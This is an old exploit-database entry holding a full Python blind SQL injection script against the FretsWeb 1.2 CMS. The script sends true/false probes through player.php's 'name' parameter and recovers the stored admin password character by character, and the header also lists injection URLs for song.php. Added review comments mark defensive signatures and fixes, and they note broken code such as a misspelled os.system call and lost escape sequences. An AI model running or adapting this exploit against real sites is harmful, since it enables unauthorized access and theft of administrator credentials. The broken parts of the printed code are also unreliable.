
# Title : FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit
# Published : 2009-06-17
# Author : YEnH4ckEr
# Previous Title : FretsWeb 1.2 Multiple Local File Inclusion Vulnerabilities
# Next Title : phportal 1.0 Insecure Cookie Handling Vulnerability


#!/usr/bin/python
#***********************************************************************************************
#***********************************************************************************************
#**	       										      **
#**  											      **
#**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
#**     || || ||  []        [][]   []   []  []     []   []      [] []   []	  []    []    **
#   [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
#**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]--- 
#**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
#**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
#   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    
#**							                                      **
#**    											      **
#**                           VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O                      **
#**					   PROUD TO BE SPANISH!	                              **
#**											      **
#***********************************************************************************************
#***********************************************************************************************
#
#---------------------------------------------------------------------------------------------
#|       	   	     (GET var 'name') BLIND SQL INJECTION EXPLOIT      	             |
#|-------------------------------------------------------------------------------------------|
#|                                    |      FretsWeb 1.2      |		    	     |
#|  CMS INFORMATION:          	      ------------------------	               	             |
#|										             |
#|-->WEB: http://sourceforge.net/projects/fretsweb/			       		     |
#|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/		                     |
#|-->DEMO: N/A										     |
#|-->CATEGORY: CMS / Games/Entertainment						     |
#|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It...             |
#|		is an improved version of FoFCS.It is meant for...          		     |
#|-->RELEASED: 2009-05-30								     |
#|											     |
#|  CMS VULNERABILITY:									     |
#|											     |
#|-->TESTED ON: firefox 3						                     |
#|-->DORK: N/A									             |
#|-->CATEGORY: BLIND SQLi PYTHON EXPLOIT					             |
#|-->AFFECT VERSION: CURRENT (MAYBE <= ?)				 		     |
#|-->Discovered Bug date: 2009-06-02							     |
#|-->Reported Bug date: 2009-06-02							     |
#|-->Fixed bug date: 2009-06-14								     |
#|-->Info patch: http://sourceforge.net/projects/fretsweb/				     |
#|-->Author: YEnH4ckEr									     |
#|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
#|-->WEB/BLOG: N/A									     |
#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.      |
#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)		     |
#---------------------------------------------------------------------------------------------
#
#------------
#CONDITIONS:
#------------
#
#magic quotes=OFF
#
#-------
#NEED:
#-------
#
#Valid name
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#http://[HOST]/[PATH]/player.php?name=[valid_name]'+and+1=1%23 --> TRUE
#http://[HOST]/[PATH]/player.php?name=[valid_name]'+AND+1=0%23 --> FALSE
#
#
#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=1%23 --> TRUE
#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=0%23 --> FALSE
#
#--------------
#WATCH VIDEOS
#--------------
#
# BSQLi --> http://www.youtube.com/watch?v=BYrkuAN2ggI
#
# LFI --> http://www.youtube.com/watch?v=LZ8cG_sIHow
#
#
##############################################################################
##############################################################################
##**************************************************************************##
##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
##**************************************************************************##
##--------------------------------------------------------------------------##
##**************************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
##**************************************************************************##
##############################################################################
##############################################################################
#
#Used modules
import urllib,sys,re,os
#Defined functions
def init():
	"""Clear the console, set a window title/colour on Windows, and print the banner.

	Side effects only: shells out through os.system and writes to stdout.
	"""
	if(sys.platform=='win32'):
		os.system("cls")
		os.system ("title FretsWeb 1.2 Blind SQL Injection Exploit")
		os.system ("color 02")
	else:
		# NOTE(review): 'os.sytem' is a misspelling of os.system, so this branch
		# raises AttributeError on every non-Windows platform before anything else runs.
		os.sytem("clear")
	# NOTE(review): the leading 't' and trailing 'n'/'nn' on these strings look like
	# \t / \n escape sequences whose backslashes were lost when the listing was
	# copied -- confirm against the original file before relying on the exact output.
	print "t#######################################################nn"
	print "t#######################################################nn"
	print "t##     FretsWeb 1.2 Blind SQL Injection Exploit      ##nn"
	print "t##       ++Conditions: magic_quotes=OFF              ##nn"
	print "t##       ++Needed: Valid name                        ##nn"
	print "t##               Author: Y3nh4ck3r                   ##nn"
	print "t##      Contact:y3nh4ck3r[at]gmail[dot]com           ##nn"
	print "t##            Proud to be Spanish!                   ##nn"
	print "t#######################################################nn"
	print "t#######################################################nn"
	
def request(urltarget):
	"""Fetch *urltarget* with urllib.urlopen and return the raw response body.

	Every probe the script sends goes through here as a plain GET, so the whole
	injected query string travels in the request line and will typically appear
	verbatim in the web server's access log -- the simplest place to spot this
	activity after the fact.

	No timeout is passed and the response object is never closed; a connection
	failure propagates to the caller as an exception.
	"""
	conn=urllib.urlopen(urltarget)
	outcode=conn.read()
	#print outcode #--> uncomment to dump each response body while debugging
	return outcode

def error():
	"""Report that the boolean oracle did not behave as expected, then exit.

	Prints the likely causes (patched target, wrong host/path, wrong name,
	magic_quotes enabled) and terminates the process through sys.exit().
	"""
	report=(
		"t------------------------------------------------------------n",
		"tWeb isn't vulnerable!nn",
		"t--->Maybe:nn",
		"tt1.-Patched.n",
		"tt2.-Bad path or host.n",
		"tt3.-Bad name.n",
		"tt4.-Magic quotes ON.n",
		"ttEXPLOIT FAILED!n",
		"t------------------------------------------------------------n",
	)
	print "\n".join(report)
	sys.exit()

def testedblindsql():
	"""Announce that the true/false probe pair produced different pages.

	Informational only: prints a short banner and returns None.
	"""
	banner=[
		"t-----------------------------------------------------------------n",
		"tWEB MAYBE BE VULNERABLE!nn",
		"tTested Blind SQL Injection.n",
		"tStarting exploit...n",
		"t-----------------------------------------------------------------nn",
	]
	for text in banner:
		print text

def helper(filename):
	"""Print the usage text for the script invoked as *filename*, then exit.

	Called when fewer than three positional arguments were supplied.
	"""
	invocation="t[!!!] python "+filename
	usage=[
		"nt[!!!] FretsWeb 1.2 Blind SQL Injection Exploitn",
		"t[!!!] USAGE MODE: [!!!]n",
		invocation+" [HOST] [PATH] [NAME]n",
		"t[!!!] [HOST]: Web.n",
		"t[!!!] [PATH]: Home Path.n",
		"t[!!!] [NAME]: Name for fishn",
		"t[!!!] Example: python "+filename+" 'www.example.com' 'demo' 'y3nh4ck3r'n",
	]
	for line in usage:
		print line
	sys.exit()
	
def brute_length(urlrequest):
	"""Recover the length of contest_config.admin_password through a boolean oracle.

	One GET is sent per candidate length (1, 2, 3, ...) with an appended
	`AND (SELECT length(value) ...)=<i>` clause; the response counts as "true"
	when its body contains the normal player-page title. If i passes 50 the
	script calls error(), which exits the process, so longer values are never
	reported.

	From a defender's viewpoint this is the noisy part of the attack: up to
	fifty near-identical requests to player.php whose `name` parameter differs
	only in a trailing integer, each carrying an unescaped quote and `%23`.
	Prepared statements (or proper escaping) on the `name` lookup remove the
	oracle entirely.

	Returns the first length whose probe returned the player page.
	"""
	# Length of the admin_password value (the original comment said "username",
	# but the query below reads contest_config WHERE name='admin_password').
	flag=1
	i=0
	while(flag==1):
		i=i+1
		blindsql=urlrequest+"'+AND+(SELECT+length(value)+FROM+contest_config+WHERE+name='admin_password')="+str(i)+"%23" #injected code
		output=request(blindsql)
		# Oracle: the normal page title only renders when the injected predicate holds.
		if(re.search("<title>Fretsweb - Player</title>",output)):
			flag=2
		else:
			flag=1
		# Upper bound on the length that will be probed; error() never returns.
		if (i>50):
			error()
		#Save column length
	length=i
	print "t<<<<<--------------------------------------------------------->>>>>n"
	print "tLength catched!n"
	print "tLength Username --> "+str(length)+"n"
	print "tWait several minutes...n"
	print "t<<<<<--------------------------------------------------------->>>>>nn"
	return length
	
def exploiting (lengthvalue,urlrequest):
	"""Recover admin_password one character at a time through the same oracle.

	For each position k (1..lengthvalue) the loop walks z over ASCII 32..126 and
	asks whether ascii(substring(value, k, 1)) = z; a hit appends chr(z) to the
	result and moves to the next position. The while-condition also stops the
	loop as soon as z passes 126 with no hit for the current position, so the
	returned string can be shorter than lengthvalue.

	Each probe is a separate GET (up to 95 per character), so the burst of
	requests to player.php with `ascii(substring(` in the `name` parameter is an
	easy signature for WAF rules or log-based detection. The header of this file
	states the stored value is not hashed; storing a password hash instead would
	limit the damage even if the injection were still present.

	Returns the recovered characters as a str.
	"""
	#Bruteforcing values
	values=""
	k=1
	z=32
	while((k<=lengthvalue) and (z<=126)):
		blindsql=urlrequest+"'+AND+ascii(substring((SELECT+value+FROM+contest_config+WHERE+name='admin_password'),"+str(k)+",1))="+str(z)+"%23" #injected code
		output=request(blindsql)
		if(re.search("<title>Fretsweb - Player</title>",output)):
			values=values+chr(z)
			k=k+1
			z=32
		# Advance to the next candidate character.
		z=z+1 
	return values
#Main
#Main
init()
#Init variables
# Positional arguments: argv[1]=host, argv[2]=path, argv[3]=name. Fewer than
# three prints the usage text and exits (helper() calls sys.exit()).
if(len(sys.argv) <= 3):
    helper(sys.argv[0])

host=sys.argv[1]
path=sys.argv[2]
nameforfish=sys.argv[3]
# The three values are concatenated into the URL without any encoding.
finalrequest="http://"+host+"/"+path+"/player.php?name="+nameforfish
# Vulnerability check: two probes that differ only in a trivially true / false
# predicate appended after a single quote. The root cause being tested is an
# unparameterized query behind player.php?name (the header records a fix dated
# 2009-06-14); prepared statements close it regardless of magic_quotes.
testblind1=finalrequest+"'+AND+1=1%23" #Return true
outcode1=request(testblind1)
testblind2=finalrequest+"'+AND+1=0%23" #Return false
outcode2=request(testblind2)
#Check BSQLi
# Identical bodies => the predicate did not reach the query. NOTE(review): the
# comparison is a plain equality of full bodies, so any per-request dynamic
# content would make the pages differ and pass this check regardless.
if(outcode1==outcode2):
	error()
else:
	testedblindsql()
#Catching length of admin password
lengthadmin=brute_length(finalrequest)
#Catching value of password (not hashed)
passwordadmin=exploiting(lengthadmin,finalrequest)
print "ntt*************************************************n"
print "tt*********  EXPLOIT EXECUTED SUCCESSFULLY ********n"
print "tt*************************************************nn"
print "ttAdmin-password: "+passwordadmin+"nn"
print "ntt<<----------------------FINISH!-------------------->>nn"
print "tt<<---------------Thanks to: y3nh4ck3r-------------->>nn"
print "tt<<------------------------EOF---------------------->>nn"
#Check all arguments

# www.Syue.com [2009-06-17]